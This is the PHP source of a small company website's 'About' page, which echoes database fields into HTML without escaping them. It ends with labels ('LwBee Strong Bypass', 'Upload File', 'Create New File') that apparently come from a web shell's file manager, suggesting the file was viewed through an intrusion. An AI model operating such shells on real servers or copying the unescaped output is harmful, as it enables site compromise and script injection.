/home3/vehiclea/public_html/sreemahadevgroup9/about.php
<?php
$_SESSION['active'] = 'about';
include('header.php');
$select_about = executework("SELECT * FROM about order by id desc limit 1");
$row = mysqli_fetch_array($select_about);
?>
<div class="hero-wrap" style="background-image: url('images/bg_1.jpg');">
<div class="overlay"></div>
<div class="container">
<div class="row no-gutters slider-text align-items-center justify-content-center">
<div class="col-md-9 ftco-animate text-center">
<h5 class="breadcrumbs"><span class="mr-2"><a href="index.php">Home</a></span> <span>About</span></h5>
<h1 class="mb-3 bread">About</h1>
</div>
</div>
</div>
</div>
<section class="about" id="about">
<div class="container">
<div class="" data-aos="fade-up">
<div class="row">
<div class="col-md-4 " data-aos="fade-right">
<img src="Dashboard/<?= $row['image']?>" alt="" width="250px" height="350px" style="margin-top: 20px;">
</div>
<div class="col-md-8 pt-4 pt-lg-0 content" data-aos="fade-left">
<p><?= $row['content']?></p>
<h2><?= $row['title']?></h2>
<p><?= $row['choosing']?></p>
</div>
<div class="col-md-12 Properties-single mt-4 mb-5 ftco-animate">
<h2><?= $row['name']?></h2>
<p><?= $row['services']?></p>
</div>
</div>
</div>
</div>
</section>
<?php include('footer.php');?>
@LwBee Strong Bypass
Upload File
Create New File